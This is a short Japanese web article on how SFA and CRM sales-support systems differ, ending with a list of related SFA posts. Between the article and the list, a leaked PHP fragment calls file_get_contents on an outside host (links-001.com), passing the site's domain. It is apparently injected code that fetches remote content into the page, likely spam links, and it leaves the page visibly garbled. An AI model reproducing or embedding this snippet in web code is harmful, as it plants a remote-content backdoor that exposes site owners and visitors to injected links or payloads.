SFAとCRMはどのように違うのでしょう

営業における支援システムには、顧客の管理や分析が重要視されます。
その中でも現在は顧客情報の管理を中心に据えながら、訪問状況や売上見込みなどの営業プロセスを一元に管理することができるソリューションが主流となっています。
その中にSFAとCRMが存在します。
両者の違いはなんでしょうか。
営業支援システムであるSFAは、予算と実績を比較し目標達成率や達成状況を見る管理機能、案件ごとの進捗を見ることができる管理機能、営業活動を日々報告する機能などが備わっています。
そのような営業プロセスを一元に管理でき可視化することで、漏れを少なくすることができるのがSFA。
膨大かつ詳細な顧客管理をすることが出来たり、そのような情報を蓄積することで社内で共有することで、顧客満足度を高めるという目的なのがCRMとなります。
どちらもまったく別のソリューションでしたが、どちらも営業に関するシステムであるため現在はひとまとめとして売られるケースが多いです。

".file_get_contents('http://links-001.com/dmset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新投稿

  • SFAを導入することでの営業の効率化

    営業の効率化としてのツールとしてSFAがありますが、このSFAはITの技術でもって営業を効率化しよう

    続きを読む...

  • SFAに必要な機能とその機能概要

    営業支援システムとしてのSFAに必要な機能はたくさんありますが、その中でもっとも重要なものが営業プロ

    続きを読む...

  • SFAは営業支援のためのシステムです

    SFAと言うのが注目されています。
    これは営業支援システムの事であり、様々な製品を販売する営業

    続きを読む...